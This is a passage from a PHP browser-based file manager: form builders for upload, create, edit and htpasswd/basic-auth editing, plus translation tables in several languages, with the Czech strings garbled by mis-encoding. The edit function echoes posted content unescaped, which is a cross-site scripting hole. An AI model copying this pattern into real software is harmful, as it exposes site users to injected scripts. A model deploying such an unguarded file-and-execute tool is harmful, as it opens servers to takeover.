        <input type="hidden" name="focus" value="" />
        <input type="hidden" name="olddir" value="' . html($directory) . '" />
';

    $actions = array();
    if (@is_writable(dirname($file['path']))) {
        $actions[] = 'delete';
        $actions[] = 'move';
    }
    $actions[] = 'copy';

    echo '        <select class="small" name="action_all" size="1">
        <option value="">' . str_repeat('&nbsp;', 30) . '</option>
';

    foreach ($actions as $action) {
        echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
    }

    echo '        </select>
        <input class="small" type="submit" name="submit_all" value=" &gt; " onfocus="activate(\'other\')" />
    </td>
</tr>
';

}

function column_title ($column, $sort, $reverse) {
    global $self, $directory;

    $d = 'dir=' . urlencode($directory) . '&amp;';

    if ($sort == $column) {
        if (!$reverse) {
            $r = '&amp;reverse=true';
            $arr = ' &and;';
        } else {
            $arr = ' &or;';
        }
    } else {
        $r = '';
    }
    echo "\t<th class=\"$column\"><a href=\"$self?{$d}sort=$column$r\">" . word($column) . "</a>$arr</th>\n";

}

function directory_choice () {
    global $directory, $homedir, $cols, $self;


    echo '<tr>
    <td colspan="' . $cols . '" id="directory">
        <a href="' . $self . '?dir=' . urlencode($homedir) . '">' . word('directory') . '</a>:
        <input type="text" name="dir" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" onfocus="activate(\'directory\')" />
        <input type="submit" name="changedir" value="' . word('change') . '" onfocus="activate(\'directory\')" />
    </td>
</tr>
';

}

function upload_box () {
    global $cols;

    echo '<tr>
    <td colspan="' . $cols . '" id="upload">
        ' . word('file') . ':
        <input type="file" name="upload" onfocus="activate(\'other\')" />
        <input type="submit" name="submit_upload" value="' . word('upload') . '" onfocus="activate(\'other\')" />
    </td>
</tr>
';

}

function create_box () {
    global $cols;

    echo '<tr>
    <td colspan="' . $cols . '" id="create">
        <select name="create_type" size="1" onfocus="activate(\'create\')">
        <option value="file">' . word('file') . '</option>
        <option value="directory">' . word('directory') . '</option>
        </select>
        <input type="text" name="create_name" onfocus="activate(\'create\')" />
        <input type="submit" name="submit_create" value="' . word('create') . '" onfocus="activate(\'create\')" />
    </td>
</tr>
';

}

function edit ($file) {
    global $self, $directory, $editcols, $editrows, $apache, $htpasswd, $htaccess;

    html_header();

    echo '<h2 style="margin-bottom: 3pt">' . html($file) . '</h2>

<form action="' . $self . '" method="post">

<table class="dialog">
<tr>
<td class="dialog">

    <textarea name="content" cols="' . $editcols . '" rows="' . $editrows . '" WRAP="off">';

    if (array_key_exists('content', $_POST)) {
        echo $_POST['content'];
    } else {
        $f = fopen($file, 'r');
        while (!feof($f)) {
            echo html(fread($f, 8192));
        }
        fclose($f);
    }

    if (!empty($_POST['user'])) {
        echo "\n" . $_POST['user'] . ':' . crypt($_POST['password']);
    }
    if (!empty($_POST['basic_auth'])) {
        if ($win) {
            $authfile = str_replace('\\', '/', $directory) . $htpasswd;
        } else {
            $authfile = $directory . $htpasswd;
        }
        echo "\nAuthType Basic\nAuthName &quot;Restricted Directory&quot;\n";
        echo 'AuthUserFile &quot;' . html($authfile) . "&quot;\n";
        echo 'Require valid-user';
    }

    echo '</textarea>

    <hr />
';

    if ($apache && basename($file) == $htpasswd) {
        echo '
    ' . word('user') . ': <input type="text" name="user" />
    ' . word('password') . ': <input type="password" name="password" />
    <input type="submit" value="' . word('add') . '" />

    <hr />
';

    }

    if ($apache && basename($file) == $htaccess) {
        echo '
    <input type="submit" name="basic_auth" value="' . word('add_basic_auth') . '" />

    <hr />
';

    }

    echo '
    <input type="hidden" name="action" value="edit" />
    <input type="hidden" name="file" value="' . html($file) . '" />
    <input type="hidden" name="dir" value="' . html($directory) . '" />
    <input type="reset" value="' . word('reset') . '" id="red_button" />
    <input type="submit" name="save" value="' . word('save') . '" id="green_button" style="margin-left: 50px" />

</td>
</tr>
</table>

<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>

</form>

';

    html_footer();

}

function spacer () {
    global $cols;

    echo '<tr>
    <td colspan="' . $cols . '" style="height: 1em"></td>
</tr>
';

}

function textfieldsize ($content) {

    $size = strlen($content) + 5;
    if ($size < 30) $size = 30;

    return $size;

}

function request_dump () {

    foreach ($_REQUEST as $key => $value) {
        echo "\t<input type=\"hidden\" name=\"" . html($key) . '" value="' . html($value) . "\" />\n";
    }

}

/* ------------------------------------------------------------------------- */

function html ($string) {
    global $site_charset;
    return htmlentities($string, ENT_COMPAT, $site_charset);
}

function word ($word) {
    global $words, $word_charset;
    return htmlentities($words[$word], ENT_COMPAT, $word_charset);
}

function phrase ($phrase, $arguments) {
    global $words;
    static $search;

    if (!is_array($search)) for ($i = 1; $i <= 8; $i++) $search[] = "%$i";

    for ($i = 0; $i < sizeof($arguments); $i++) {
        $arguments[$i] = nl2br(html($arguments[$i]));
    }

    $replace = array('{' => '<pre>', '}' =>'</pre>', '[' => '<b>', ']' => '</b>');

    return str_replace($search, $arguments, str_replace(array_keys($replace), $replace, nl2br(html($words[$phrase]))));

}

function getwords ($lang) {
    global $word_charset, $date_format;

    switch ($lang) {
    case 'de':

        $date_format = 'd.m.y H:i:s';
        $word_charset = 'ISO-8859-1';

        return array(
'directory' => 'Verzeichnis',
'file' => 'Datei',
'filename' => 'Dateiname',

'size' => 'Grösse',
'permission' => 'Rechte',
'owner' => 'Eigner',
'group' => 'Gruppe',
'other' => 'Andere',
'functions' => 'Funktionen',

'read' => 'lesen',
'write' => 'schreiben',
'execute' => 'ausführen',

'create_symlink' => 'Symlink erstellen',
'delete' => 'löschen',
'rename' => 'umbenennen',
'move' => 'verschieben',
'copy' => 'kopieren',
'edit' => 'editieren',
'download' => 'herunterladen',
'upload' => 'hochladen',
'create' => 'erstellen',
'change' => 'wechseln',
'save' => 'speichern',
'set' => 'setze',
'reset' => 'zurücksetzen',
'relative' => 'Pfad zum Ziel relativ',

'yes' => 'Ja',
'no' => 'Nein',
'back' => 'zurück',
'destination' => 'Ziel',
'symlink' => 'Symbolischer Link',
'no_output' => 'keine Ausgabe',

'user' => 'Benutzername',
'password' => 'Kennwort',
'add' => 'hinzufügen',
'add_basic_auth' => 'HTTP-Basic-Auth hinzufügen',

'uploaded' => '"[%1]" wurde hochgeladen.',
'not_uploaded' => '"[%1]" konnte nicht hochgeladen werden.',
'already_exists' => '"[%1]" existiert bereits.',
'created' => '"[%1]" wurde erstellt.',
'not_created' => '"[%1]" konnte nicht erstellt werden.',
'really_delete' => 'Sollen folgende Dateien wirklich gelöscht werden?',
'deleted' => "Folgende Dateien wurden gelöscht:\n[%1]",
'not_deleted' => "Folgende Dateien konnten nicht gelöscht werden:\n[%1]",
'rename_file' => 'Benenne Datei um:',
'renamed' => '"[%1]" wurde in "[%2]" umbenannt.',
'not_renamed' => '"[%1] konnte nicht in "[%2]" umbenannt werden.',
'move_files' => 'Verschieben folgende Dateien:',
'moved' => "Folgende Dateien wurden nach \"[%2]\" verschoben:\n[%1]",
'not_moved' => "Folgende Dateien konnten nicht nach \"[%2]\" verschoben werden:\n[%1]",
'copy_files' => 'Kopiere folgende Dateien:',
'copied' => "Folgende Dateien wurden nach \"[%2]\" kopiert:\n[%1]",
'not_copied' => "Folgende Dateien konnten nicht nach \"[%2]\" kopiert werden:\n[%1]",
'not_edited' => '"[%1]" kann nicht editiert werden.',
'executed' => "\"[%1]\" wurde erfolgreich ausgeführt:\n{%2}",
'not_executed' => "\"[%1]\" konnte nicht erfolgreich ausgeführt werden:\n{%2}",
'saved' => '"[%1]" wurde gespeichert.',
'not_saved' => '"[%1]" konnte nicht gespeichert werden.',
'symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" wurde erstellt.',
'not_symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" konnte nicht erstellt werden.',
'permission_for' => 'Rechte für "[%1]":',
'permission_set' => 'Die Rechte für "[%1]" wurden auf [%2] gesetzt.',
'permission_not_set' => 'Die Rechte für "[%1]" konnten nicht auf [%2] gesetzt werden.',
'not_readable' => '"[%1]" kann nicht gelesen werden.'
        );

    case 'fr':

        $date_format = 'd.m.y H:i:s';
        $word_charset = 'ISO-8859-1';

        return array(
'directory' => 'Repertoire',
'file' => 'Fichier',
'filename' => 'Nom fichier',

'size' => 'Taille',
'permission' => 'Droits',
'owner' => 'Propriétaire',
'group' => 'Groupe',
'other' => 'Autres',
'functions' => 'Fonctions',

'read' => 'Lire',
'write' => 'Ecrire',
'execute' => 'Exécuter',

'create_symlink' => 'Créer lien symbolique',
'delete' => 'Effacer',
'rename' => 'Renommer',
'move' => 'Déplacer',
'copy' => 'Copier',
'edit' => 'Ouvrir',
'download' => 'Télécharger sur PC',
'upload' => 'Télécharger sur serveur',
'create' => 'Créer',
'change' => 'Changer',
'save' => 'Sauvegarder',
'set' => 'Exécuter',
'reset' => 'Réinitialiser',
'relative' => 'Relatif',

'yes' => 'Oui',
'no' => 'Non',
'back' => 'Retour',
'destination' => 'Destination',
'symlink' => 'Lien symbollique',
'no_output' => 'Pas de sortie',

'user' => 'Utilisateur',
'password' => 'Mot de passe',
'add' => 'Ajouter',
'add_basic_auth' => 'add basic-authentification',

'uploaded' => '"[%1]" a été téléchargé sur le serveur.',
'not_uploaded' => '"[%1]" n a pas été téléchargé sur le serveur.',
'already_exists' => '"[%1]" existe déjà .',
'created' => '"[%1]" a été créé.',
'not_created' => '"[%1]" n a pas pu être créé.',
'really_delete' => 'Effacer le fichier?',
'deleted' => "Ces fichiers ont été détuits:\n[%1]",
'not_deleted' => "Ces fichiers n ont pu être détruits:\n[%1]",
'rename_file' => 'Renomme fichier:',
'renamed' => '"[%1]" a été renommé en "[%2]".',
'not_renamed' => '"[%1] n a pas pu être renommé en "[%2]".',
'move_files' => 'Déplacer ces fichiers:',
'moved' => "Ces fichiers ont été déplacés en \"[%2]\":\n[%1]",
'not_moved' => "Ces fichiers n ont pas pu être déplacés en \"[%2]\":\n[%1]",
'copy_files' => 'Copier ces fichiers:',
'copied' => "Ces fichiers ont été copiés en \"[%2]\":\n[%1]",
'not_copied' => "Ces fichiers n ont pas pu être copiés en \"[%2]\":\n[%1]",
'not_edited' => '"[%1]" ne peut être ouvert.',
'executed' => "\"[%1]\" a été brillamment exécuté :\n{%2}",
'not_executed' => "\"[%1]\" n a pas pu être exécuté:\n{%2}",
'saved' => '"[%1]" a été sauvegardé.',
'not_saved' => '"[%1]" n a pas pu être sauvegardé.',
'symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" a été crée.',
'not_symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" n a pas pu être créé.',
'permission_for' => 'Droits de "[%1]":',
'permission_set' => 'Droits de "[%1]" ont été changés en [%2].',
'permission_not_set' => 'Droits de "[%1]" n ont pas pu être changés en[%2].',
'not_readable' => '"[%1]" ne peut pas être ouvert.'
        );

    case 'it':

        $date_format = 'd-m-Y H:i:s';
        $word_charset = 'ISO-8859-1';

        return array(
'directory' => 'Directory',
'file' => 'File',
'filename' => 'Nome File',

'size' => 'Dimensioni',
'permission' => 'Permessi',
'owner' => 'Proprietario',
'group' => 'Gruppo',
'other' => 'Altro',
'functions' => 'Funzioni',

'read' => 'leggi',
'write' => 'scrivi',
'execute' => 'esegui',

'create_symlink' => 'crea link simbolico',
'delete' => 'cancella',
'rename' => 'rinomina',
'move' => 'sposta',
'copy' => 'copia',
'edit' => 'modifica',
'download' => 'download',
'upload' => 'upload',
'create' => 'crea',
'change' => 'cambia',
'save' => 'salva',
'set' => 'imposta',
'reset' => 'reimposta',
'relative' => 'Percorso relativo per la destinazione',

'yes' => 'Si',
'no' => 'No',

'back' => 'indietro',
'destination' => 'Destinazione',
'symlink' => 'Link simbolico',
'no_output' => 'no output',

'user' => 'User',
'password' => 'Password',
'add' => 'aggiungi',
'add_basic_auth' => 'aggiungi autenticazione base',

'uploaded' => '"[%1]" è stato caricato.',
'not_uploaded' => '"[%1]" non è stato caricato.',
'already_exists' => '"[%1]" esiste già .',
'created' => '"[%1]" è stato creato.',
'not_created' => '"[%1]" non è stato creato.',
'really_delete' => 'Cancello questi file ?',
'deleted' => "Questi file sono stati cancellati:\n[%1]",
'not_deleted' => "Questi file non possono essere cancellati:\n[%1]",
'rename_file' => 'File rinominato:',
'renamed' => '"[%1]" è stato rinominato in "[%2]".',
'not_renamed' => '"[%1] non è stato rinominato in "[%2]".',
'move_files' => 'Sposto questi file:',
'moved' => "Questi file sono stati spostati in \"[%2]\":\n[%1]",
'not_moved' => "Questi file non possono essere spostati in \"[%2]\":\n[%1]",
'copy_files' => 'Copio questi file',
'copied' => "Questi file sono stati copiati in \"[%2]\":\n[%1]",
'not_copied' => "Questi file non possono essere copiati in \"[%2]\":\n[%1]",
'not_edited' => '"[%1]" non può essere modificato.',
'executed' => "\"[%1]\" è stato eseguito con successo:\n{%2}",
'not_executed' => "\"[%1]\" non è stato eseguito con successo\n{%2}",
'saved' => '"[%1]" è stato salvato.',
'not_saved' => '"[%1]" non è stato salvato.',
'symlinked' => 'Il link siambolico da "[%2]" a "[%1]" è stato creato.',
'not_symlinked' => 'Il link siambolico da "[%2]" a "[%1]" non è stato creato.',
'permission_for' => 'Permessi di "[%1]":',
'permission_set' => 'I permessi di "[%1]" sono stati impostati [%2].',
'permission_not_set' => 'I permessi di "[%1]" non sono stati impostati [%2].',
'not_readable' => '"[%1]" non può essere letto.'
        );

    case 'nl':

        $date_format = 'n/j/y H:i:s';
        $word_charset = 'ISO-8859-1';

        return array(
'directory' => 'Directory',
'file' => 'Bestand',
'filename' => 'Bestandsnaam',

'size' => 'Grootte',
'permission' => 'Bevoegdheid',
'owner' => 'Eigenaar',
'group' => 'Groep',
'other' => 'Anderen',
'functions' => 'Functies',

'read' => 'lezen',
'write' => 'schrijven',
'execute' => 'uitvoeren',

'create_symlink' => 'maak symlink',
'delete' => 'verwijderen',
'rename' => 'hernoemen',
'move' => 'verplaatsen',
'copy' => 'kopieren',
'edit' => 'bewerken',
'download' => 'downloaden',
'upload' => 'uploaden',
'create' => 'aanmaken',
'change' => 'veranderen',
'save' => 'opslaan',
'set' => 'instellen',
'reset' => 'resetten',
'relative' => 'Relatief pat naar doel',

'yes' => 'Ja',
'no' => 'Nee',
'back' => 'terug',
'destination' => 'Bestemming',
'symlink' => 'Symlink',
'no_output' => 'geen output',

'user' => 'Gebruiker',
'password' => 'Wachtwoord',
'add' => 'toevoegen',
'add_basic_auth' => 'add basic-authentification',

'uploaded' => '"[%1]" is verstuurd.',
'not_uploaded' => '"[%1]" kan niet worden verstuurd.',
'already_exists' => '"[%1]" bestaat al.',
'created' => '"[%1]" is aangemaakt.',
'not_created' => '"[%1]" kan niet worden aangemaakt.',
'really_delete' => 'Deze bestanden verwijderen?',
'deleted' => "Deze bestanden zijn verwijderd:\n[%1]",
'not_deleted' => "Deze bestanden konden niet worden verwijderd:\n[%1]",
'rename_file' => 'Bestandsnaam veranderen:',
'renamed' => '"[%1]" heet nu "[%2]".',
'not_renamed' => '"[%1] kon niet worden veranderd in "[%2]".',
'move_files' => 'Verplaats deze bestanden:',
'moved' => "Deze bestanden zijn verplaatst naar \"[%2]\":\n[%1]",
'not_moved' => "Kan deze bestanden niet verplaatsen naar \"[%2]\":\n[%1]",
'copy_files' => 'Kopieer deze bestanden:',
'copied' => "Deze bestanden zijn gekopieerd naar \"[%2]\":\n[%1]",
'not_copied' => "Deze bestanden kunnen niet worden gekopieerd naar \"[%2]\":\n[%1]",
'not_edited' => '"[%1]" kan niet worden bewerkt.',
'executed' => "\"[%1]\" is met succes uitgevoerd:\n{%2}",
'not_executed' => "\"[%1]\" is niet goed uitgevoerd:\n{%2}",
'saved' => '"[%1]" is opgeslagen.',
'not_saved' => '"[%1]" is niet opgeslagen.',
'symlinked' => 'Symlink van "[%2]" naar "[%1]" is aangemaakt.',
'not_symlinked' => 'Symlink van "[%2]" naar "[%1]" is niet aangemaakt.',
'permission_for' => 'Bevoegdheid voor "[%1]":',
'permission_set' => 'Bevoegdheid van "[%1]" is ingesteld op [%2].',
'permission_not_set' => 'Bevoegdheid van "[%1]" is niet ingesteld op [%2].',
'not_readable' => '"[%1]" kan niet worden gelezen.'
        );

    case 'se':

        $date_format = 'n/j/y H:i:s';
        $word_charset = 'ISO-8859-1';

        return array(
'directory' => 'Mapp',
'file' => 'Fil',
'filename' => 'Filnamn',

'size' => 'Storlek',
'permission' => 'Säkerhetsnivå',
'owner' => '�gare',
'group' => 'Grupp',
'other' => 'Andra',
'functions' => 'Funktioner',

'read' => 'Läs',
'write' => 'Skriv',
'execute' => 'Utför',

'create_symlink' => 'Skapa symlink',
'delete' => 'Radera',
'rename' => 'Byt namn',
'move' => 'Flytta',
'copy' => 'Kopiera',
'edit' => '�ndra',
'download' => 'Ladda ner',
'upload' => 'Ladda upp',
'create' => 'Skapa',
'change' => '�ndra',
'save' => 'Spara',
'set' => 'Markera',
'reset' => 'Töm',
'relative' => 'Relative path to target',

'yes' => 'Ja',
'no' => 'Nej',
'back' => 'Tillbaks',
'destination' => 'Destination',
'symlink' => 'Symlink',
'no_output' => 'no output',

'user' => 'Användare',
'password' => 'Lösenord',
'add' => 'Lägg till',
'add_basic_auth' => 'add basic-authentification',

'uploaded' => '"[%1]" har laddats upp.',
'not_uploaded' => '"[%1]" kunde inte laddas upp.',
'already_exists' => '"[%1]" finns redan.',
'created' => '"[%1]" har skapats.',
'not_created' => '"[%1]" kunde inte skapas.',
'really_delete' => 'Radera dessa filer?',
'deleted' => "De här filerna har raderats:\n[%1]",
'not_deleted' => "Dessa filer kunde inte raderas:\n[%1]",
'rename_file' => 'Byt namn på fil:',
'renamed' => '"[%1]" har bytt namn till "[%2]".',
'not_renamed' => '"[%1] kunde inte döpas om till "[%2]".',
'move_files' => 'Flytta dessa filer:',
'moved' => "Dessa filer har flyttats till \"[%2]\":\n[%1]",
'not_moved' => "Dessa filer kunde inte flyttas till \"[%2]\":\n[%1]",
'copy_files' => 'Kopiera dessa filer:',
'copied' => "Dessa filer har kopierats till \"[%2]\":\n[%1]",
'not_copied' => "Dessa filer kunde inte kopieras till \"[%2]\":\n[%1]",
'not_edited' => '"[%1]" kan inte ändras.',
'executed' => "\"[%1]\" har utförts:\n{%2}",
'not_executed' => "\"[%1]\" kunde inte utföras:\n{%2}",
'saved' => '"[%1]" har sparats.',
'not_saved' => '"[%1]" kunde inte sparas.',
'symlinked' => 'Symlink från "[%2]" till "[%1]" har skapats.',
'not_symlinked' => 'Symlink från "[%2]" till "[%1]" kunde inte skapas.',
'permission_for' => 'Rättigheter för "[%1]":',
'permission_set' => 'Rättigheter för "[%1]" ändrades till [%2].',
'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].',
'not_readable' => '"[%1]" kan inte läsas.'
        );

    case 'es':

        $date_format = 'j/n/y H:i:s';
        $word_charset = 'ISO-8859-1';

        return array(
'directory' => 'Directorio',
'file' => 'Archivo',
'filename' => 'Nombre Archivo',

'size' => 'Tamaño',
'permission' => 'Permisos',
'owner' => 'Propietario',
'group' => 'Grupo',
'other' => 'Otros',
'functions' => 'Funciones',

'read' => 'lectura',
'write' => 'escritura',
'execute' => 'ejecución',

'create_symlink' => 'crear enlace',
'delete' => 'borrar',
'rename' => 'renombrar',
'move' => 'mover',
'copy' => 'copiar',
'edit' => 'editar',
'download' => 'bajar',
'upload' => 'subir',
'create' => 'crear',
'change' => 'cambiar',
'save' => 'salvar',
'set' => 'setear',
'reset' => 'resetear',
'relative' => 'Path relativo',

'yes' => 'Si',
'no' => 'No',
'back' => 'atrás',
'destination' => 'Destino',
'symlink' => 'Enlace',
'no_output' => 'sin salida',

'user' => 'Usuario',
'password' => 'Clave',
'add' => 'agregar',
'add_basic_auth' => 'agregar autentificación básica',

'uploaded' => '"[%1]" ha sido subido.',
'not_uploaded' => '"[%1]" no pudo ser subido.',
'already_exists' => '"[%1]" ya existe.',
'created' => '"[%1]" ha sido creado.',
'not_created' => '"[%1]" no pudo ser creado.',
'really_delete' => '¿Borra estos archivos?',
'deleted' => "Estos archivos han sido borrados:\n[%1]",
'not_deleted' => "Estos archivos no pudieron ser borrados:\n[%1]",
'rename_file' => 'Renombra archivo:',
'renamed' => '"[%1]" ha sido renombrado a "[%2]".',
'not_renamed' => '"[%1] no pudo ser renombrado a "[%2]".',
'move_files' => 'Mover estos archivos:',
'moved' => "Estos archivos han sido movidos a \"[%2]\":\n[%1]",
'not_moved' => "Estos archivos no pudieron ser movidos a \"[%2]\":\n[%1]",
'copy_files' => 'Copiar estos archivos:',
'copied' => "Estos archivos han sido copiados a  \"[%2]\":\n[%1]",
'not_copied' => "Estos archivos no pudieron ser copiados \"[%2]\":\n[%1]",
'not_edited' => '"[%1]" no pudo ser editado.',
'executed' => "\"[%1]\" ha sido ejecutado correctamente:\n{%2}",
'not_executed' => "\"[%1]\" no pudo ser ejecutado correctamente:\n{%2}",
'saved' => '"[%1]" ha sido salvado.',
'not_saved' => '"[%1]" no pudo ser salvado.',
'symlinked' => 'Enlace desde "[%2]" a "[%1]" ha sido creado.',
'not_symlinked' => 'Enlace desde "[%2]" a "[%1]" no pudo ser creado.',
'permission_for' => 'Permisos de "[%1]":',
'permission_set' => 'Permisos de "[%1]" fueron seteados a [%2].',
'permission_not_set' => 'Permisos de "[%1]" no pudo ser seteado a [%2].',
'not_readable' => '"[%1]" no pudo ser leído.'
        );

    case 'dk':

        $date_format = 'n/j/y H:i:s';
        $word_charset = 'ISO-8859-1';

        return array(
'directory' => 'Mappe',
'file' => 'Fil',
'filename' => 'Filnavn',

'size' => 'Størrelse',
'permission' => 'Rettighed',
'owner' => 'Ejer',
'group' => 'Gruppe',
'other' => 'Andre',
'functions' => 'Funktioner',

'read' => 'læs',
'write' => 'skriv',
'execute' => 'kør',

'create_symlink' => 'opret symbolsk link',
'delete' => 'slet',
'rename' => 'omdøb',
'move' => 'flyt',
'copy' => 'kopier',
'edit' => 'rediger',
'download' => 'download',
'upload' => 'upload',
'create' => 'opret',
'change' => 'skift',
'save' => 'gem',
'set' => 'sæt',
'reset' => 'nulstil',
'relative' => 'Relativ sti til valg',

'yes' => 'Ja',
'no' => 'Nej',
'back' => 'tilbage',
'destination' => 'Distination',
'symlink' => 'Symbolsk link',
'no_output' => 'ingen resultat',

'user' => 'Bruger',
'password' => 'Kodeord',
'add' => 'tilføj',
'add_basic_auth' => 'tilføj grundliggende rettigheder',

'uploaded' => '"[%1]" er blevet uploaded.',
'not_uploaded' => '"[%1]" kunnu ikke uploades.',
'already_exists' => '"[%1]" findes allerede.',
'created' => '"[%1]" er blevet oprettet.',
'not_created' => '"[%1]" kunne ikke oprettes.',
'really_delete' => 'Slet disse filer?',
'deleted' => "Disse filer er blevet slettet:\n[%1]",
'not_deleted' => "Disse filer kunne ikke slettes:\n[%1]",
'rename_file' => 'Omdød fil:',
'renamed' => '"[%1]" er blevet omdøbt til "[%2]".',
'not_renamed' => '"[%1] kunne ikke omdøbes til "[%2]".',
'move_files' => 'Flyt disse filer:',
'moved' => "Disse filer er blevet flyttet til \"[%2]\":\n[%1]",
'not_moved' => "Disse filer kunne ikke flyttes til \"[%2]\":\n[%1]",
'copy_files' => 'Kopier disse filer:',
'copied' => "Disse filer er kopieret til \"[%2]\":\n[%1]",
'not_copied' => "Disse filer kunne ikke kopieres til \"[%2]\":\n[%1]",
'not_edited' => '"[%1]" kan ikke redigeres.',
'executed' => "\"[%1]\" er blevet kørt korrekt:\n{%2}",
'not_executed' => "\"[%1]\" kan ikke køres korrekt:\n{%2}",
'saved' => '"[%1]" er blevet gemt.',
'not_saved' => '"[%1]" kunne ikke gemmes.',
'symlinked' => 'Symbolsk link fra "[%2]" til "[%1]" er blevet oprettet.',
'not_symlinked' => 'Symbolsk link fra "[%2]" til "[%1]" kunne ikke oprettes.',
'permission_for' => 'Rettigheder for "[%1]":',
'permission_set' => 'Rettigheder for "[%1]" blev sat til [%2].',
'permission_not_set' => 'Rettigheder for "[%1]" kunne ikke sættes til [%2].',
'not_readable' => '"[%1]" Kan ikke læses.'
        );

    case 'tr':

        $date_format = 'n/j/y H:i:s';
        $word_charset = 'ISO-8859-1';

        return array(
'directory' => 'Klasor',
'file' => 'Dosya',
'filename' => 'dosya adi',

'size' => 'boyutu',
'permission' => 'Izin',
'owner' => 'sahip',
'group' => 'Grup',
'other' => 'Digerleri',
'functions' => 'Fonksiyonlar',

'read' => 'oku',
'write' => 'yaz',
'execute' => 'calistir',

'create_symlink' => 'symlink olustur',
'delete' => 'sil',
'rename' => 'ad degistir',

'move' => 'tasi',
'copy' => 'kopyala',
'edit' => 'duzenle',
'download' => 'indir',
'upload' => 'Yukle',
'create' => 'olustur',
'change' => 'degistir',
'save' => 'kaydet',
'set' => 'ayar',
'reset' => 'sifirla',
'relative' => 'Hedef yola gore',

'yes' => 'Evet',
'no' => 'Hayir',
'back' => 'Geri',
'destination' => 'Hedef',
'symlink' => 'Kisa yol',
'no_output' => 'cikti yok',

'user' => 'Kullanici',
'password' => 'Sifre',
'add' => 'ekle',
'add_basic_auth' => 'ekle basit-authentification',

'uploaded' => '"[%1]" yuklendi.',
'not_uploaded' => '"[%1]" yuklenemedi.',
'already_exists' => '"[%1]" kullanilmakta.',
'created' => '"[%1]" olusturuldu.',
'not_created' => '"[%1]" olusturulamadi.',
'really_delete' => 'Bu dosyalar silinsin mi DOSTUM?',
'deleted' => "Bu dosyalar silindi:\n[%1]",
'not_deleted' => "Bu dosyalar silinemedi:\n[%1]",
'rename_file' => 'Adi degisen dosya:',
'renamed' => '"[%1]" adili dosyanin yeni adi "[%2]".',
'not_renamed' => '"[%1] adi degistirilemedi "[%2]" ile.',
'move_files' => 'Tasinan dosyalar:',
'moved' => "Bu dosyalari tasidiginiz yer \"[%2]\":\n[%1]",
'not_moved' => "Bu dosyalari tasiyamadiginiz yer \"[%2]\":\n[%1]",
'copy_files' => 'Kopyalanan dosyalar:',
'copied' => "Bu dosyalar kopyalandi \"[%2]\":\n[%1]",
'not_copied' => "Bu dosyalar kopyalanamiyor \"[%2]\":\n[%1]",
'not_edited' => '"[%1]" duzenlenemiyor.',
'executed' => "\"[%1]\" Basariyla Calistirildi:\n{%2}",
'not_executed' => "\"[%1]\" Calistirilamadi:\n{%2}",
'saved' => '"[%1]" Kaydedildi.',
'not_saved' => '"[%1]" kaydedilemedi.',
'symlinked' => '"[%2]" den "[%1]" e kisayol olusturuldu.',
'not_symlinked' => '"[%2]"den "[%1]" e kisayol olusturulamadi.',
'permission_for' => 'Izinler "[%1]":',
'permission_set' => 'Izinler "[%1]" degistirildi [%2].',
'permission_not_set' => 'Izinler "[%1]" degistirilemedi [%2].',
'not_readable' => '"[%1]" okunamiyor.'
        );

    case 'cs':

        $date_format = 'd.m.y H:i:s';
        $word_charset = 'UTF-8';

        return array(
'directory' => 'Adres�¡��',
'file' => 'Soubor',
'filename' => 'Jm�©no souboru',

'size' => 'Velikost',
'permission' => 'Pr�¡va',
'owner' => 'Vlastn�­k',
'group' => 'Skupina',
'other' => 'Ostatn�­',
'functions' => 'Funkce',

'read' => '��ten�­',
'write' => 'Z�¡pis',
'execute' => 'Spou�¡t��n�­',

'create_symlink' => 'Vytvo��it symbolick�� odkaz',
'delete' => 'Smazat',
'rename' => 'P��ejmenovat',
'move' => 'P��esunout',
'copy' => 'Zkop�­rovat',
'edit' => 'Otev���­t',
'download' => 'St�¡hnout',
'upload' => 'Nahraj na server',
'create' => 'Vytvo��it',
'change' => 'Zm��nit',
'save' => 'Ulo�Ÿit',
'set' => 'Nastavit',
'reset' => 'zp��t',
'relative' => 'Relatif',

'yes' => 'Ano',
'no' => 'Ne',
'back' => 'Zp��t',
'destination' => 'Destination',
'symlink' => 'Symbolick�� odkaz',
'no_output' => 'Pr�¡zdn�� v��stup',

'user' => 'U�Ÿivatel',
'password' => 'Heslo',
'add' => 'P��idat',
'add_basic_auth' => 'p��idej z�¡kladn�­ autentizaci',

'uploaded' => 'Soubor "[%1]" byl nahr�¡n na server.',
'not_uploaded' => 'Soubor "[%1]" nebyl nahr�¡n na server.',
'already_exists' => 'Soubor "[%1]" u�Ÿ exituje.',
'created' => 'Soubor "[%1]" byl vytvo��en.',
'not_created' => 'Soubor "[%1]" nemohl bÃ�Å�t  vytvoÃ�Â�en.',
'really_delete' => 'Vymazat soubor?',
'deleted' => "Byly vymaz�¡ny tyto soubory:\n[%1]",
'not_deleted' => "Tyto soubory nemohly b��t vytvo��eny:\n[%1]",
'rename_file' => 'P��ejmenuj soubory:',
'renamed' => 'Soubor "[%1]" byl p��ejmenov�¡n na "[%2]".',
'not_renamed' => 'Soubor "[%1]" nemohl b��t p��ejmenov�¡n na "[%2]".',
'move_files' => 'P��em�­stit tyto soubory:',
'moved' => "Tyto soubory byly p��em�­st��ny do \"[%2]\":\n[%1]",
'not_moved' => "Tyto soubory nemohly b��t p��em�­st��ny do \"[%2]\":\n[%1]",
'copy_files' => 'Zkop�­rovat tyto soubory:',
'copied' => "Tyto soubory byly zkop�­rov�¡ny do \"[%2]\":\n[%1]",
'not_copied' => "Tyto soubory nemohly b��t zkop�­rov�¡ny do \"[%2]\":\n[%1]",
'not_edited' => 'Soubor "[%1]" nemohl b��t otev��en.',
'executed' => "SOubor \"[%1]\" byl spu�¡t��n :\n{%2}",
'not_executed' => "Soubor \"[%1]\" nemohl b��t spu�¡t��n:\n{%2}",
'saved' => 'Soubor "[%1]" byl ulo�Ÿen.',
'not_saved' => 'Soubor "[%1]" nemohl b��t ulo�Ÿen.',
'symlinked' => 'Byl vyvo��en symbolick�� odkaz "[%2]" na soubor "[%1]".',
'not_symlinked' => 'Symbolick�� odkaz "[%2]" na soubor "[%1]" nemohl b��t vytvo��en.',
'permission_for' => 'Pr�¡va k "[%1]":',
'permission_set' => 'Pr�¡va k "[%1]" byla zm��n��na na [%2].',
